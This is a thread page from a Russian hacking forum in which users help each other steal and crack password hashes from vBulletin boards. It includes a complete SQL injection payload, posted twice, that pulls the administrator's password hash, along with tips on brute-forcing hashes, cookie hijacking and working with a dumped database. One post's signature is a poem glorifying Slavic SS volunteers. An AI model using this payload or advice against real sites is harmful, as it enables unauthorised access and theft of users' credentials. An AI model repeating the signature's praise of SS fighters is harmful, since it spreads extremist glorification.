ANTICHAT Forum
HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
НОВЫЕ ТОРГОВАЯ НОВОСТИ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Песочница
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #21  
Старый 21.06.2012, 00:36
Sat-hacker
Познающий
Регистрация: 19.05.2012
Сообщений: 98
С нами: 7359446

Репутация: -10
По умолчанию

Цитата:
Сообщение от linvel  
скачать любой брут, в разделе криптография и бруть
Какой к примеру?
 
Ответить с цитированием

  #22  
Старый 21.06.2012, 02:23
Onths
Познающий
Регистрация: 03.05.2012
Сообщений: 57
С нами: 7382486

Репутация: -4
По умолчанию

Цитата:
Сообщение от Sat-hacker  
А в какой именно таблице?Или просто откріть всю базу 1,5 GB в текстовом документе и через поиск искать id 1?
Да как угодно.

Можно вывести соль и пароль определенного юзера, а можно слить себе б.д и искать там, если есть такая возможность.

Брути обычным брутом по видяхе.
 
Ответить с цитированием

  #23  
Старый 21.06.2012, 02:46
+toxa+
[Лишённый самовыражени
Регистрация: 16.01.2005
Сообщений: 1,787
С нами: 11217866

Репутация: 3812


По умолчанию

Не в обиду ТС конечно, но нахер такую тему.

Цитата:
Сообщение от None  
чтобы вытащить соль нужно вставлять такой код
__________________
 
Ответить с цитированием

  #24  
Старый 21.06.2012, 09:09
Sat-hacker
Познающий
Регистрация: 19.05.2012
Сообщений: 98
С нами: 7359446

Репутация: -10
По умолчанию

Базу уже слил,а вот как пароль там искать не пойму.
 
Ответить с цитированием

  #25  
Старый 22.06.2012, 16:16
Skipp
Новичок
Регистрация: 12.05.2010
Сообщений: 2
С нами: 8421303

Репутация: 0
По умолчанию

Цитата:
Сообщение от p0wER  
Красной полоской я отделил первоначальный код и код который вставили мы. Пришло время рассказать вам о проблеме с который можно столкнуться после отправки этого запроса. На скрине видно, что я обвел красным кружочком "vb_" - это префикс, который может быть в названиях таблиц в базе данных, если вы отправляете запрос без префикса, а в БД таблицы с префиксом, то очевидно вы никакого хэша не получите, только ошибку. Как быть в таком случае? Все очень просто, отправляем запрос без префиксов,
получаем страницу с ошибкой базы данных
, открываем исходный код страницы и ищем следующее:

Здравствуйте, подскажите как получить эту самую страницу с ошибкой, о которой пишет автор (выделено зелёным цветом). Я делал как в статье, в Live HTTP Replay в Post запрос дописывал код

Код:
humanverify[]=&searchfromtype=vBForum%3ASocialGroupMessage&do=process&contenttypeid=5&categoryid[]=-99) union select password from user where userid=1 and row(1,1)>(select count(*),concat( (select user.password) ,0x3a,floor(rand(0)*2)) x from (select 1 union select 2 union select 3)a group by x limit 1) -- /*
нажимаю повтор, а затем обновляю в Мозиле страницу с поиском??? Но ошибку на ней не выводит (вот здесь я может не то что-то делаю?)... Пробовал на разных версиях vBulletin
 
Ответить с цитированием

  #26  
Старый 22.06.2012, 16:20
HAXTA4OK
Reservists Of Antichat - Level 6
Регистрация: 15.03.2009
Сообщений: 568
С нами: 9030566

Репутация: 2017


По умолчанию

Цитата:
Сообщение от Skipp  
Здравствуйте, подскажите как получить эту самую страницу с ошибкой, о которой пишет автор (выделено зелёным цветом). Я делал как в статье, в Live HTTP Replay в Post запрос дописывал код
Код:
humanverify[]=&searchfromtype=vBForum%3ASocialGroupMessage&do=process&contenttypeid=5&categoryid[]=-99) union select password from user where userid=1 and row(1,1)>(select count(*),concat( (select user.password) ,0x3a,floor(rand(0)*2)) x from (select 1 union select 2 union select 3)a group by x limit 1) -- /*
нажимаю повтор, а затем обновляю в Мозиле страницу с поиском??? Но ошибку на ней не выводит (вот здесь я может не то что-то делаю?)... Пробовал на разных версиях vBulletin
может пофикшенная версия, может все таки ты что то не так делал, возможно пробелы не убрал , когда копировал запрос(форум имеет свойство поставить пробел в слове),
__________________
В сырых могилах Второй Мировой
Солдатам снятся цветные сны.
Их кости порой видны под первой травой,
Когда сойдет снег в начале весны.
Славяне тоже сражались в отрядах СС
За чистоту арийской крови.
Теперь они дремлют за чертою небес,
Но снова встанут на бой, лишь позови.
 
Ответить с цитированием

  #27  
Старый 22.06.2012, 18:55
Dr.Strangelove
Новичок
Регистрация: 01.12.2008
Сообщений: 26
С нами: 9180250

Репутация: 10
По умолчанию

мда.. ачат уже не тот, что ранее
 
Ответить с цитированием

  #28  
Старый 22.06.2012, 19:04
t3cHn0iD
Новичок
Регистрация: 06.04.2009
Сообщений: 2
С нами: 8998242

Репутация: 2
По умолчанию

Цитата:
Сообщение от Dr.Strangelove  
мда.. ачат уже не тот, что ранее
Еще бы.В этой теме идет подмена кук, содержащих хэш залогиненного юзера, а это боян страшнейший.
 
Ответить с цитированием

  #29  
Старый 24.06.2012, 00:02
Loller
Новичок
Регистрация: 20.06.2012
Сообщений: 1
С нами: 7313366

Репутация: 0
По умолчанию

Я извиняюсь за беспокойство, но мне не понятен один пункт.

Идем на сайт lj.onas/md5 и делаем все, что там написано

Что вписывать в поле здесь пишем свой текст, из которого надо получить md5?

Спасибо за ответ.
 
Ответить с цитированием

  #30  
Старый 03.02.2013, 01:35
bri
Новичок
Регистрация: 04.06.2012
Сообщений: 0
С нами: 7336406

Репутация: 0
По умолчанию

ne aktualno
 
Ответить с цитированием
Ответ



Предыдущая тема Следующая тема

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.